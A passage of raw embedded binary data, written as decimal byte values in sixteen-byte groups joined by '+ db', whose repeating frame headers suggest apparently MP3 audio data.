255,227,20,196,208,9,64,207,7,32,48,76,20,83,127,192 + db 245,245,167,255,7,228,24,191,161,2,216,78,195,151,208,200 + db 128,141,235,207,40,120,56,215,159,134,175,211,198,33,209,51 + db 255,227,20,196,206,8,0,195,11,32,48,76,20,69,14,162 + db 25,148,68,175,221,4,192,226,225,194,50,161,132,153,243,20 + db 227,73,21,255,206,173,245,33,135,30,165,60,206,29,19,48 + db 255,227,20,196,209,9,192,194,247,32,64,210,52,152,4,196 + db 46,37,27,161,107,169,255,214,104,59,191,255,253,12,88,110 + db 179,36,137,9,133,179,12,97,159,196,1,56,0,82,38,167 + db 255,227,20,196,205,9,0,202,235,34,41,134,224,72,114,104 + db 192,62,14,20,4,157,247,85,171,160,231,255,182,245,22,55 + db 79,1,74,5,140,0,148,172,94,161,148,54,171,1,236,248 + db 255,227,20,196,204,8,192,74,227,134,50,12,8,94,39,178 + db 92,117,127,157,255,254,167,39,244,121,47,1,21,6,140,33 + db 39,143,26,68,109,18,238,144,61,172,14,179,79,255,156,255 + db 255,227,20,196,204,8,193,86,231,135,69,40,0,169,254,163 + db 157,223,245,190,143,2,70,160,79,10,5,8,185,33,206,233 + db 212,7,190,186,62,105,5,191,184,192,19,245,97,148,247,56 + db 255,227,20,196,204,14,241,210,243,33,143,40,1,36,80,92 + db 99,180,175,16,151,0,195,154,1,163,65,167,170,125,100,239 + db 220,210,1,36,126,167,126,187,88,155,233,67,72,16,162,154 + db 255,227,20,196,179,8,0,122,247,33,205,24,0,20,100,138 + db 212,230,211,0,208,29,212,8,210,130,131,207,21,83,164,200 + db 57,231,94,145,230,255,223,245,52,184,99,176,221,109,200,160 + db 255,227,20,196,182,6,192,42,231,32,123,204,0,59,228,106 + db 94,130,223,11,151,125,129,241,48,197,63,210,95,245,92,221 + db 48,64,14,97,98,171,51,129,16,123,249,239,229,159,76,26 + db 255,227,20,196,190,7,64,74,231,38,121,146,36,123,56,137 + db 254,120,151,228,4,24,61,171,22,133,176,0,0,97,44,116 + db 31,122,102,251,118,216,128,114,0,173,98,24,82,45,121,198 + db 255,227,20,196,196,7,64,74,223,38,121,198,70,133,44,65 + db 250,144,224,102,38,243,30,129,20,17,148,18,92,118,59,16 + db 143,87,179,87,179,219,255,224,156,222,227,230,230,255,254,124 + db 255,227,20,196,202,8,64,34,231,62,18,204,0,187,221,126 + db 96,70,99,231,28,80,200,0,187,0,101,191,0,91,233,24 + db 221,16,93,45,216,212,112,18,30,144,232,195,51,49,169,168 + db 255,227,20,196,204,8,192,18,215,100,65,128,0,211,229,29 + db 156,148,69,45,27,46,51,115,157,134,235,89,93,239,95,12 + db 98,89,102,4,80,130,7,85,102,124,124,172,245,219,212,122 + db 255,227,20,196,204,8,192,18,231,182,16,0,0,143,243,252 + db 140,135,204,134,118,146,246,155,189,255,223,222,153,14,219,186 + db 182,207,11,65,111,148,17,2,103,116,156,165,9,167,250,47 + db 255,227,20,196,204,8,192,74,199,51,70,0,0,255,255,255 + db 255,255,255,255,255,255,112,16,166,184,67,150,133,6,190,182 + db 132,3,127,212,99,255,71,253,39,18,91,138,3,191,234,97 + db 255,227,20,196,204,19,193,90,231,143,152,48,0,10,2,12 + db 32,194,137,13,48,229,58,134,132,16,207,127,255,255,255,228 + db 130,174,234,64,24,0,42,34,2,60,129,43,140,203,100,15 + db 255,227,20,196,160,19,193,218,227,49,152,48,1,207,117,27 + db 170,31,255,177,255,167,255,250,127,255,246,82,16,136,129,192 + db 225,3,128,24,124,7,7,250,63,247,87,74,169,41,197,228 + db 255,227,20,196,116,6,129,151,11,33,199,40,0,111,25,70 + db 152,120,234,24,70,205,88,190,238,12,234,68,132,186,156,194 + db 163,83,24,239,46,107,78,232,50,8,234,109,77,234,71,93 + db 255,227,20,196,125,4,129,143,7,32,40,4,244,125,6,172 + db 225,48,209,144,92,205,19,37,234,44,70,113,13,233,186,108 + db 68,85,107,65,107,114,85,21,153,155,60,192,223,175,167,179 + db 255,227,20,196,142,6,0,58,231,32,122,76,0,255,226,141 + db 254,84,5,137,12,223,246,255,255,249,205,255,81,31,255,56 + db 159,253,74,167,253,9,63,255,178,155,253,65,0,255,240,17 + db 255,227,20,196,153,10,193,82,231,47,73,40,0,63,255,87 + db 95,244,16,225,223,44,123,253,81,47,225,99,81,112,110,120 + db 126,101,154,221,127,114,80,60,91,47,39,255,255,215,255,191 + db 255,227,20,196,145,18,1,226,255,33,137,104,0,250,133,24 + db 184,212,62,18,0,89,203,20,111,234,228,22,255,212,191,247 + db 221,5,63,217,247,249,111,158,4,224,210,74,140,183,23,10 + db 255,227,20,196,108,7,65,219,7,33,194,56,0,47,211,107 + db 127,244,255,255,249,255,232,55,136,69,221,216,176,192,193,102 + db 180,185,80,7,79,250,55,253,63,245,255,165,191,234,223,250 + db 255,227,20,196,114,5,129,71,11,32,16,5,36,149,59,120 + db 192,232,29,61,12,99,14,130,148,58,46,247,187,184,106,209 + db 142,121,234,30,255,215,255,189,78,64,225,47,63,255,217,64 + db 255,227,20,196,127,6,105,67,11,32,64,4,225,197,251,127 + db 224,133,63,246,8,126,143,206,149,110,81,111,8,63,26,8 + db 223,247,255,253,70,1,125,127,246,238,20,127,255,213,191,200 + db 255,227,20,196,136,5,129,67,15,32,40,5,40,113,26,127 + db 132,154,142,82,251,59,43,145,175,255,247,4,223,255,255,255 + db 244,10,23,248,17,229,111,31,241,23,171,127,244,56,82,163 + db 255,227,20,196,149,5,1,191,3,32,80,4,240,190,132,99 + db 190,115,229,115,127,189,191,87,67,191,107,217,0,33,235,255 + db 252,67,113,190,108,31,240,126,68,55,41,76,161,129,48,242 + db 255,227,20,196,164,8,185,198,255,32,56,202,49,164,189,178 + db 223,217,37,4,240,64,192,220,46,42,30,106,81,255,209,127 + db 124,30,146,55,13,238,135,255,147,244,48,161,20,84,29,255 + db 255,227,20,196,164,8,129,195,11,32,40,5,96,20,94,145 + db 40,9,216,148,71,243,253,62,175,200,16,209,68,146,116,122 + db 254,55,252,224,222,191,87,252,175,130,46,86,75,254,83,172 + db 255,227,20,196,165,7,1,195,11,32,40,5,96,151,162,224 + db 25,137,49,144,97,86,230,33,68,183,213,194,137,79,60,117 + db 218,220,132,141,6,159,72,104,26,6,176,84,4,77,95,44 + db 255,227,20,196,172,6,129,91,11,32,1,78,140,151,82,224 + db 174,188,175,196,49,32,220,235,219,225,200,6,45,58,158,121 + db 27,250,159,235,93,57,206,113,110,179,250,191,203,159,216,81 + db 255,227,20,196,181,6,193,91,3,32,16,10,168,63,154,58 + db 66,174,198,143,53,223,42,176,179,124,212,30,18,219,245,186 + db 245,166,129,142,95,164,16,145,70,49,226,14,35,118,108,0 + db 255,227,20,196,189,8,1,55,15,32,0,68,88,103,172,63 + db 137,195,31,228,118,185,92,206,177,64,21,111,230,63,255,253 + db 159,255,252,165,47,83,187,6,127,64,140,106,122,54,222,161 + db 255,227,20,196,192,7,64,167,19,32,1,132,8,195,5,16 + db 160,157,2,168,128,153,182,83,0,92,77,254,141,254,59,252 + db 98,100,251,255,141,111,255,220,130,108,223,99,13,2,167,227 + db 255,227,20,196,198,6,0,123,19,32,9,138,4,23,248,76 + db 96,239,212,212,22,184,89,229,106,48,193,186,206,254,114,124 + db 196,111,220,136,70,216,32,178,93,126,159,41,131,30,255,111 + db 255,227,20,196,209,10,0,122,255,32,72,68,4,249,103,241 + db 47,123,241,72,119,115,249,242,162,80,177,157,255,255,83,194 + db 55,228,243,249,106,171,57,29,190,194,224,184,62,67,254,146 + db 255,227,20,196,204,7,128,238,251,32,88,196,4,255,254,22 + db 123,168,99,194,192,97,67,65,81,244,58,243,54,183,233,52 + db 82,2,75,125,82,230,16,79,209,212,112,3,221,203,129,199 + db 255,227,20,196,209,10,1,31,7,32,56,5,32,175,6,133 + db 47,253,115,149,148,196,199,130,137,11,47,71,255,160,209,103 + db 255,83,183,253,64,97,111,242,20,91,177,102,190,237,117,118 + db 255,227,20,196,204,7,249,211,7,32,56,5,97,211,231,0 + db 200,9,84,50,195,170,23,188,134,30,149,191,161,140,255,255 + db 215,255,243,57,141,180,168,105,66,148,232,3,217,237,243,112 + db 255,227,20,196,207,9,65,198,247,32,18,138,161,15,129,193 + db 56,244,92,243,3,235,27,242,180,64,62,69,244,146,255,187 + db 254,91,253,0,176,92,64,9,135,90,144,179,163,222,202,255 + db 255,227,20,196,205,8,129,6,243,32,43,196,160,84,27,6 + db 242,113,211,158,207,64,16,10,131,167,55,87,63,246,95,255 + db 255,189,95,170,34,12,28,142,84,53,210,25,99,167,186,191 + db 255,227,20,196,206,9,0,186,255,32,0,210,16,196,56,248 + db 193,155,48,65,84,200,14,17,0,138,9,3,184,197,50,71 + db 91,193,23,154,107,207,36,159,103,18,134,249,101,107,13,130 + db 255,227,20,196,205,9,128,239,7,32,1,142,8,131,200,255 + db 223,157,189,69,141,238,148,188,237,20,8,162,116,64,0,16 + db 133,252,241,125,247,59,30,183,211,32,200,50,32,56,161,161 + db 255,227,20,196,202,7,1,31,15,32,40,10,104,255,255,250 + db 255,203,175,135,227,75,196,37,166,195,2,82,38,162,96,32 + db 214,109,166,239,149,87,149,71,26,99,213,63,206,178,51,144 + db 255,227,20,196,209,8,193,67,3,32,72,196,20,98,130,130 + db 253,26,223,138,249,224,178,127,250,19,3,22,113,103,246,255 + db 66,152,43,110,85,19,203,244,125,81,202,107,161,196,255,148 + db 255,227,20,196,209,8,128,90,251,32,56,144,0,43,42,198 + db 196,240,27,163,184,138,42,50,26,147,90,8,81,13,113,128 + db 169,116,73,10,221,247,126,193,85,45,75,213,255,74,7,133 + db 255,227,20,196,210,9,105,162,255,32,56,5,9,132,131,28 + db 28,54,75,144,2,66,248,138,11,117,70,59,103,245,232,32 + db 249,71,127,251,229,207,172,209,145,81,75,255,242,18,175,179 + db 255,227,20,196,207,8,192,66,243,32,16,12,64,9,127,233 + db 1,218,30,181,10,157,117,203,11,202,181,43,74,193,133,101 + db 69,1,19,95,254,173,150,109,90,173,50,26,142,160,45,88 + db 255,227,20,196,207,9,0,226,251,32,16,12,128,73,105,21 + db 145,114,136,46,194,216,109,246,40,81,6,131,22,239,142,69 + db 107,249,74,145,23,245,132,73,40,47,121,6,45,138,88,229 + db 255,227,20,196,206,10,129,26,255,32,10,12,224,138,178,198 + db 49,95,224,48,42,8,24,176,53,58,251,185,228,231,20,56 + db 24,27,161,57,132,17,231,36,66,244,220,12,91,255,254,169 + db 255,227,20,196,199,5,193,23,11,32,16,5,32,32,42,127 + db 193,169,81,106,109,213,138,85,100,35,150,72,114,104,142,0 + db 131,14,62,233,15,255,228,13,72,250,44,73,87,168,183,255 + db 255,227,20,196,211,10,128,74,235,32,19,216,4,255,253,78 + db 79,233,240,24,138,2,152,73,38,20,164,61,157,196,182,75 + db 104,5,202,143,146,213,246,43,2,214,212,216,237,90,246,94 + db 255,227,20,196,204,7,192,111,3,32,11,10,0,143,255,255 + db 253,169,128,26,19,67,212,4,140,252,170,116,215,56,214,108 + db 4,12,4,128,77,126,81,32,192,92,44,73,19,127,255,237 + db 255,227,20,196,208,8,193,30,239,32,123,4,4,65,45,71 + db 165,191,8,39,6,48,97,167,102,105,128,128,242,3,160,70 + db 14,2,224,153,181,24,153,203,63,162,84,233,211,223,217,87 + db 255,227,20,196,208,9,128,18,231,50,121,128,0,253,223,174 + db 175,171,154,233,69,36,140,206,65,204,112,1,132,28,35,40 + db 114,136,234,81,114,166,93,255,251,93,232,4,207,160,49,16 + db 255,227,20,196,205,8,64,206,251,32,24,71,0,4,22,31 + db 46,31,19,239,136,4,255,207,229,63,130,128,5,134,136,173 + db 50,60,40,22,253,62,57,92,203,156,202,245,69,229,67,9 + db 255,227,20,196,207,9,0,194,255,32,16,204,20,143,163,105 + db 81,11,62,234,235,231,182,175,97,114,213,42,222,242,20,64 + db 231,23,117,101,18,113,103,171,41,199,135,26,67,244,194,40 + db 255,227,20,196,206,9,0,194,247,32,24,88,76,198,244,28 + db 55,176,124,1,26,105,166,190,123,137,7,255,93,69,108,193 + db 218,191,255,182,206,60,38,182,234,61,60,143,195,232,18,28 + db 255,227,20,196,205,8,192,194,231,44,24,6,160,132,82,121 + db 119,231,234,95,43,50,191,248,254,122,21,120,34,159,111,255 + db 19,151,7,6,255,170,8,212,117,185,74,84,3,2,219,243 + db 255,227,20,196,205,8,192,74,223,38,99,210,66,102,154,193 + db 96,38,200,119,127,255,255,105,198,160,62,12,209,255,253,244 + db 255,245,31,79,197,196,207,255,168,62,107,255,254,163,48,77 + db 255,227,20,196,205,10,192,58,231,39,79,0,0,63,255,253 + db 191,171,82,150,19,50,15,255,246,211,255,249,45,219,255,185 + db 192,228,185,254,25,133,33,239,255,255,255,243,0,52,227,63 + db 255,227,20,196,197,15,65,202,235,33,152,40,0,255,127,255 + db 232,89,127,170,181,178,114,60,161,152,255,233,116,17,0,12 + db 237,245,235,251,232,116,116,99,145,8,36,115,36,125,250,110 + db 255,227,20,196,171,6,192,74,247,33,201,0,0,242,63,101 + db 18,207,146,26,185,193,236,64,0,184,7,152,22,39,112,175 + db 21,255,250,19,239,255,177,198,132,93,246,222,129,99,213,73 + db 255,227,20,196,179,7,0,210,243,32,88,6,228,144,237,117 + db 38,123,66,65,198,226,32,81,26,111,18,3,142,117,187,136 + db 127,163,147,239,221,40,247,129,159,117,101,138,67,49,0,140 + db 255,227,20,196,186,8,129,222,251,32,40,14,200,135,143,119 + db 197,61,141,22,13,155,136,34,0,56,7,50,215,204,250,83 + db 204,198,104,224,56,85,190,127,140,62,15,128,198,255,108,42 + db 255,227,20,196,187,7,1,218,243,32,80,26,168,41,162,33 + db 187,255,148,189,227,222,238,220,217,37,85,7,84,50,79,75 + db 236,108,158,169,161,49,19,22,12,94,144,241,156,165,173,84 + db 255,227,20,196,194,6,65,222,247,32,56,20,204,108,173,8 + db 194,59,105,21,173,132,104,180,161,81,157,209,138,155,115,248 + db 173,194,205,204,253,126,63,102,193,178,23,101,156,16,131,27 + db 255,227,20,196,204,7,193,86,231,32,16,10,200,253,254,251 + db 160,143,208,24,144,202,205,191,255,255,145,58,42,28,66,172 + db 254,132,127,202,67,81,100,149,240,117,75,249,137,73,164,66 + db 255,227,20,196,208,8,128,206,235,33,75,40,0,112,247,13 + db 63,250,63,255,211,82,135,202,132,131,95,244,241,52,173,212 + db 213,36,64,36,168,99,224,117,34,112,250,119,127,255,255,46 + db 255,227,20,196,209,16,193,98,251,33,143,64,0,45,151,4 + db 2,0,128,33,203,255,178,180,237,193,178,137,248,70,195,227 + db 49,21,35,212,153,169,52,152,18,31,191,79,78,186,107,210 + db 255,227,20,196,177,17,121,115,7,33,140,72,1,221,102,164 + db 243,141,51,63,61,227,228,177,59,20,9,183,112,146,148,47 + db 252,87,47,253,127,160,0,61,74,84,245,51,47,247,28,173 + db 255,227,20,196,142,6,0,139,19,33,194,16,0,252,78,255 + db 200,38,205,252,194,166,120,229,245,252,95,163,127,168,51,126 + db 134,2,127,251,55,251,17,255,236,111,230,113,71,117,132,255 + db 255,227,20,196,153,6,192,94,247,32,88,204,12,255,169,63 + db 236,178,154,32,32,17,105,119,190,160,11,127,137,129,135,127 + db 255,78,127,252,223,246,2,55,217,255,250,131,223,200,128,0 + db 255,227,20,196,161,7,128,74,247,33,73,0,0,72,160,162 + db 77,127,245,127,248,132,179,123,127,243,190,43,224,135,255,213 + db 2,127,224,20,30,140,129,138,94,51,0,4,124,184,107,255 + db 255,227,20,196,166,11,65,123,19,33,131,56,0,255,253,98 + db 55,100,204,239,161,252,84,207,133,9,190,211,128,33,121,249 + db 232,209,199,255,255,119,255,254,178,37,67,142,22,254,200,61 + db 255,227,20,196,156,7,129,91,15,33,193,40,0,229,128,163 + db 25,167,245,152,240,26,35,245,234,86,3,63,254,223,253,127 + db 232,79,245,147,252,246,239,114,28,132,57,153,169,212,32,176 + db 255,227,20,196,161,6,1,51,15,32,1,68,76,13,34,186 + db 71,250,47,246,14,218,154,239,112,96,38,126,36,2,0,167 + db 254,163,247,252,244,48,87,44,207,13,127,255,157,35,168,240 + db 255,227,20,196,172,7,65,51,11,32,25,74,160,192,143,205 + db 146,246,99,48,178,122,191,97,28,146,75,168,243,255,161,224 + db 224,86,113,1,61,245,2,26,195,255,103,236,196,225,87,117 + db 255,227,20,196,178,6,0,139,15,32,9,142,4,47,223,91 + db 0,79,33,190,132,14,29,45,244,101,255,208,172,229,254,96 + db 33,65,216,241,67,160,118,56,160,67,166,18,214,227,200,200 + db 255,227,20,196,189,6,64,87,11,32,64,76,44,212,95,207 + db 239,68,36,255,172,44,60,255,212,62,4,255,56,186,254,130 + db 1,192,210,254,240,28,89,89,62,132,30,95,19,35,68,48 + db 255,227,20,196,199,6,0,82,255,32,56,12,0,253,105,205 + db 166,202,65,198,7,81,118,253,78,255,138,200,155,211,158,89 + db 255,81,28,19,26,157,254,54,36,254,89,158,111,171,212,75 + db 255,227,20,196,210,10,65,154,251,32,73,196,69,71,253,48 + db 184,22,8,6,145,44,72,194,136,207,36,254,239,81,223,205 + db 160,212,215,250,15,64,145,168,172,17,53,119,35,232,22,226 + db 255,227,20,196,204,7,192,194,247,32,88,20,132,43,239,129 + db 191,192,240,212,135,51,143,202,90,213,151,255,65,80,237,125 + db 2,128,88,62,182,208,160,19,142,62,70,148,251,234,123,62 + db 255,227,20,196,208,8,128,202,247,32,104,14,224,173,36,228 + db 191,102,21,199,73,41,40,166,189,46,96,153,254,120,158,91 + db 252,67,5,159,243,129,82,255,66,3,255,160,128,38,33,200 + db 255,227,20,196,209,9,0,238,251,32,9,132,64,121,127,41 + db 232,110,4,23,119,119,198,207,221,169,58,24,49,254,178,149 + db 191,169,91,253,21,191,233,250,4,128,202,86,255,255,51,255 + db 255,227,20,196,208,8,193,59,3,32,9,138,64,169,127,205 + db 250,137,255,228,172,210,194,114,241,230,202,206,17,2,67,251 + db 107,255,255,162,255,32,208,59,254,199,59,126,232,127,233,127 + db 255,227,20,196,208,8,129,7,11,32,9,142,8,241,169,153 + db 100,205,182,203,249,127,250,122,32,0,226,212,191,65,71,185 + db 47,1,127,196,92,19,113,231,19,21,1,29,169,190,142,184 + db 255,227,20,196,209,9,128,215,3,32,72,84,76,53,32,32 + db 10,58,172,100,78,3,74,134,81,108,70,166,40,25,52,89 + db 244,36,143,122,189,94,149,143,102,153,227,9,34,73,86,205 + db 255,227,20,196,206,8,192,214,255,32,56,212,16,51,255,79 + db 105,45,19,80,172,28,87,226,251,243,22,139,174,82,111,76 + db 71,227,125,41,152,141,59,0,157,106,76,111,75,215,18,153 + db 255,227,20,196,206,8,193,38,247,32,104,212,4,5,82,156 + db 68,21,55,194,179,47,52,164,208,224,47,232,112,112,233,98 + db 243,63,222,235,204,152,112,220,2,138,127,222,251,97,194,64 + db 255,227,20,196,206,9,65,226,247,32,50,74,64,251,95,252 + db 189,146,248,115,231,255,250,171,155,134,197,68,164,254,163,246 + db 61,166,247,108,123,141,73,3,99,103,255,255,165,56,167,63 + db 255,227,20,196,204,7,193,227,3,32,56,10,232,153,121,234 + db 103,201,223,231,101,73,147,1,53,56,166,182,235,187,238,255 + db 24,154,117,202,140,223,96,237,148,59,9,208,60,23,61,48 + db 255,227,20,196,208,8,128,122,251,32,10,68,48,67,65,181 + db 207,82,238,105,6,93,63,99,231,170,170,149,119,63,168,107 + db 244,109,144,90,139,9,135,158,96,123,66,234,47,137,152,158 + db 255,227,20,196,209,9,64,90,227,46,72,140,102,162,228,249 + db 149,35,232,8,13,94,156,12,86,94,245,94,119,86,255,55 + db 245,8,127,255,253,70,132,248,137,172,203,123,125,167,19,131 + db 255,227,20,196,207,9,128,74,199,35,70,0,0,25,92,225 + db 167,109,91,136,98,80,76,64,229,3,74,255,255,178,181,149 + db 67,191,253,195,63,232,84,227,231,248,100,74,230,165,111,229 + db 255,227,20,196,204,17,129,226,251,33,143,88,0,186,127,235 + db 96,224,79,255,124,192,177,195,93,191,250,0,63,228,172,135 + db 122,169,16,213,197,82,234,191,205,251,127,253,156,208,56,223 + db 255,227,20,196,169,18,57,171,3,33,143,88,1,255,244,80 + db 158,117,191,179,249,95,205,255,154,106,32,64,92,249,139,50 + db 126,48,16,47,255,255,255,172,204,38,141,255,255,175,255,245 + db 255,227,20,196,131,6,64,155,19,33,197,16,0,47,203,255 + db 204,96,32,38,127,213,52,255,255,160,46,7,66,239,254,97 + db 137,111,255,177,64,136,92,52,187,95,83,29,199,177,12,192 + db 255,227,20,196,141,6,64,19,27,32,16,64,0,223,231,28 + db 201,226,250,116,57,139,213,229,232,83,18,205,131,64,246,235 + db 129,16,63,52,129,191,62,112,249,48,217,129,178,100,192,246 + db 255,227,20,196,151,6,192,203,15,32,24,4,160,177,226,29 + db 234,127,31,174,196,216,202,105,132,218,124,182,228,255,79,9 + db 16,62,4,232,48,36,168,211,237,117,4,8,196,160,246,179 + db 255,227,20,196,159,7,1,82,255,32,80,21,96,123,223,100 + db 247,86,119,86,121,44,121,150,81,162,160,201,171,142,218,43 + db 162,19,116,21,33,199,92,106,206,89,143,47,100,223,171,90 + db 255,227,20,196,166,6,193,218,255,32,56,20,232,174,78,229 + db 216,182,179,98,10,158,71,173,65,192,18,148,157,187,59,254 + db 159,240,17,127,98,191,190,70,111,168,187,191,87,183,255,117 + db 255,227,20,196,174,6,113,86,243,33,66,56,1,127,168,16 + db 18,159,156,102,119,40,133,255,96,190,4,98,117,144,12,253 + db 90,166,253,20,43,255,255,254,51,168,104,205,204,45,246,23 + db 255,227,20,196,183,16,241,106,255,33,130,88,1,8,196,13 + db 249,9,57,185,255,253,168,36,48,24,93,38,223,95,163,254 + db 143,165,113,141,13,144,254,61,107,38,4,189,62,50,242,3 + db 255,227,20,196,150,13,193,95,15,33,137,56,0,237,194,17 + db 248,100,68,188,39,29,160,167,236,2,187,217,53,136,105,255 + db 165,77,62,47,168,239,250,116,253,219,85,193,115,212,108,35 + db 255,227,20,196,130,6,129,3,19,33,197,40,0,231,98,127 + db 66,223,168,248,77,254,255,208,192,124,75,242,133,89,200,118 + db 245,250,121,64,207,167,80,209,195,55,202,132,38,226,46,92 + db 255,227,20,196,139,6,192,255,7,32,56,4,224,38,239,255 + db 6,185,80,158,76,195,191,145,234,103,18,255,223,82,202,93 + db 121,194,9,77,191,99,11,39,238,254,223,242,0,50,246,99 + db 255,227,20,196,147,6,192,154,255,33,74,72,0,187,123,152 + db 131,11,125,70,127,205,106,214,119,204,128,2,8,220,213,58 + db 39,195,134,1,1,250,204,255,167,231,8,57,126,96,171,213 + db 255,227,20,196,155,11,65,27,11,33,134,64,0,232,254,196 + db 255,132,52,132,19,25,129,0,110,7,151,152,158,179,208,215 + db 249,75,111,81,40,255,209,168,168,139,136,191,36,9,129,113 + db 255,227,20,196,145,7,65,7,7,33,194,56,0,148,10,81 + db 194,7,84,181,71,172,70,1,244,87,253,9,169,94,175,217 + db 219,235,103,70,159,202,0,232,103,53,210,95,72,162,221,194 + db 255,227,20,196,151,6,128,78,255,32,17,70,68,6,168,15 + db 134,23,133,142,117,132,2,35,252,48,247,121,196,244,100,17 + db 123,235,32,151,110,25,140,7,122,30,108,69,27,70,232,64 + db 255,227,20,196,160,7,129,75,3,32,16,4,192,80,245,190 + db 32,28,1,4,223,242,16,88,0,119,114,233,255,255,255,168 + db 64,54,175,163,142,209,82,200,235,213,176,128,203,247,52,98 + db 255,227,20,196,165,7,65,27,15,32,16,4,160,176,113,113 + db 60,228,130,1,134,12,192,138,64,16,194,203,82,164,69,190 + db 164,41,91,216,73,96,160,162,127,48,192,77,179,122,168,149 + db 255,227,20,196,171,6,192,142,247,32,11,4,12,18,10,202 + db 255,255,254,176,215,32,179,152,29,223,238,165,25,143,237,249 + db 50,157,40,186,100,118,21,67,108,186,198,48,242,7,63,247 + db 255,227,20,196,179,7,0,50,235,42,59,216,0,179,88,103 + db 254,212,177,69,220,93,10,59,255,243,190,138,144,209,225,196 + db 30,210,220,231,10,62,75,6,229,198,140,53,34,119,189,84 + db 255,227,20,196,186,9,0,70,255,32,90,70,4,21,99,193 + db 255,254,94,213,244,110,102,183,122,186,33,140,246,32,96,241 + db 168,130,161,171,148,121,223,102,122,217,111,160,217,9,136,198 + db 255,227,20,196,185,8,0,195,11,32,41,68,60,68,224,242 + db 84,241,103,57,223,167,254,31,253,48,65,26,79,222,79,253 + db 210,210,247,52,6,5,22,15,197,130,110,255,248,186,255,28 + db 255,227,20,196,188,6,120,183,7,32,18,70,225,2,50,205 + db 162,106,73,85,213,212,202,132,37,222,197,28,189,32,16,16 + db 80,52,202,127,194,0,160,16,4,237,239,208,135,110,147,57 + db 255,227,20,196,197,7,128,198,247,33,69,24,0,64,215,132 + db 133,225,208,208,46,253,190,111,195,77,71,65,39,215,215,245 + db 58,132,192,111,234,29,254,134,118,249,193,95,242,10,191,40 + db 255,227,20,196,202,11,185,218,227,33,134,40,1,207,254,174 + db 128,151,160,30,53,118,5,233,248,136,26,95,136,142,250,24 + db 224,11,126,143,251,127,202,223,177,89,253,76,42,26,213,254 + db 255,227,20,196,190,12,233,211,7,33,130,56,1,75,166,143 + db 222,30,66,9,24,164,108,117,13,189,147,250,94,10,19,131 + db 91,185,71,187,224,32,220,215,211,245,246,24,172,52,134,127 + db 255,227,20,196,173,8,1,3,19,33,194,24,0,251,242,193 + db 193,191,169,228,104,48,131,224,104,190,34,173,10,20,44,14 + db 255,228,255,175,255,255,255,255,255,249,235,114,152,168,87,56 + db 255,227,20,196,176,6,0,55,15,32,0,82,0,179,159,11 + db 217,165,10,172,25,5,232,112,72,45,13,111,137,81,189,106 + db 253,2,165,242,241,231,163,244,158,166,181,127,233,67,211,111 + db 255,227,20,196,187,5,192,179,15,32,40,4,168,189,245,55 + db 126,186,116,202,41,105,180,188,82,36,55,227,128,27,249,163 + db 215,150,55,104,157,209,221,224,212,90,79,113,208,39,202,185 + db 255,227,20,196,199,7,65,31,11,32,40,10,224,39,110,249 + db 205,125,14,174,219,88,175,184,168,192,239,249,111,8,37,56 + db 2,4,70,245,27,229,2,250,23,33,64,0,224,13,4,233 + db 255,227,20,196,205,8,65,62,247,32,81,202,16,47,110,137 + db 46,31,239,223,116,205,247,94,0,5,22,16,103,40,129,197 + db 205,247,115,253,11,126,185,165,3,23,132,16,28,90,23,188 + db 255,227,20,196,207,9,64,110,235,32,91,10,44,66,210,154 + db 26,39,196,69,66,136,226,243,120,128,243,227,128,25,246,28 + db 144,188,158,74,19,194,80,134,144,232,73,108,194,67,31,90 + db 255,227,20,196,205,9,1,154,247,33,71,16,0,248,39,28 + db 237,24,61,63,244,110,19,133,75,2,83,78,234,250,125,67 + db 84,109,91,223,239,254,175,152,175,57,119,196,196,81,189,197 + db 255,227,20,196,204,12,129,206,251,33,140,56,1,194,70,67 + db 169,123,156,128,125,236,230,89,91,37,117,223,181,91,42,220 + db 207,148,104,196,192,103,244,122,136,0,129,172,19,11,160,85 + db 255,227,20,196,189,7,128,42,219,45,198,0,0,223,254,239 + db 56,92,76,40,235,190,76,231,42,212,255,137,40,161,91,184 + db 64,44,9,138,153,28,191,255,250,176,16,178,163,133,63,221 + db 255,227,20,196,194,18,113,130,219,93,79,24,1,86,143,148 + db 22,65,14,91,137,176,184,225,103,160,50,25,13,127,113,255 + db 255,174,240,18,158,209,18,123,34,111,206,47,67,175,234,108 + db 255,227,20,196,155,18,1,218,255,33,143,88,1,80,223,245 + db 255,255,232,112,240,117,206,255,245,163,20,4,55,255,248,207 + db 204,58,253,223,226,8,104,159,171,254,223,255,168,200,2,103 + db 255,227,20,196,118,6,192,23,23,33,197,0,0,127,255,234 + db 12,69,15,255,233,107,255,245,148,255,219,211,245,32,68,115 + db 111,202,153,211,144,2,63,100,209,141,255,255,228,15,130,187 + db 255,227,20,196,126,5,192,7,27,32,8,0,0,191,255,20 + db 201,20,38,221,132,240,233,60,230,20,44,41,75,183,203,254 + db 135,20,217,153,145,55,127,255,255,10,191,205,124,226,47,41 + db 255,227,20,196,138,6,192,15,19,32,40,0,0,128,26,160 + db 80,6,14,102,197,136,65,35,62,128,150,150,20,245,226,159 + db 235,100,94,100,128,152,166,68,115,94,79,39,212,115,172,135 + db 255,227,20,196,146,6,65,87,11,32,56,11,96,29,171,181 + db 31,213,219,211,228,28,143,34,72,49,164,169,164,100,143,206 + db 91,226,239,255,253,117,250,204,103,255,215,197,127,255,167,122 + db 255,227,20,196,156,7,65,218,247,32,80,27,96,71,137,28 + db 30,108,250,140,67,145,184,173,59,251,98,69,51,69,40,150 + db 207,180,203,155,255,57,231,212,47,123,15,84,56,73,191,255 + db 255,227,20,196,162,6,65,91,3,32,40,11,4,119,111,86 + db 249,219,200,60,161,207,252,44,112,31,164,4,233,42,121,140 + db 215,238,141,99,251,8,174,255,169,235,46,125,244,124,198,6 + db 255,227,20,196,172,6,193,86,243,32,8,130,216,60,210,174 + db 179,249,100,142,5,92,84,237,127,91,5,104,28,244,20,144 + db 139,216,22,204,124,135,238,151,71,210,216,94,237,9,23,118 + db 255,227,20,196,180,11,0,206,235,32,96,196,140,39,15,255 + db 160,25,14,72,60,132,237,170,10,71,32,71,129,172,25,202 + db 130,149,130,188,237,255,250,187,111,178,255,213,233,79,48,227 + db 255,227,20,196,171,7,128,210,243,33,79,16,0,192,133,155 + db 46,69,199,183,241,91,30,97,252,37,167,255,200,125,95,245 + db 63,250,101,159,168,115,13,127,76,149,62,117,129,137,200,218 + db 255,227,20,196,176,12,65,110,235,33,152,40,0,174,74,35 + db 3,219,98,210,217,35,124,146,26,83,123,98,115,225,102,233 + db 231,61,93,140,201,254,190,32,47,44,105,239,71,90,53,8 + db 255,227,20,196,162,8,128,74,235,33,205,0,0,245,161,110 + db 42,97,20,61,172,55,27,0,192,1,74,164,4,200,5,91 + db 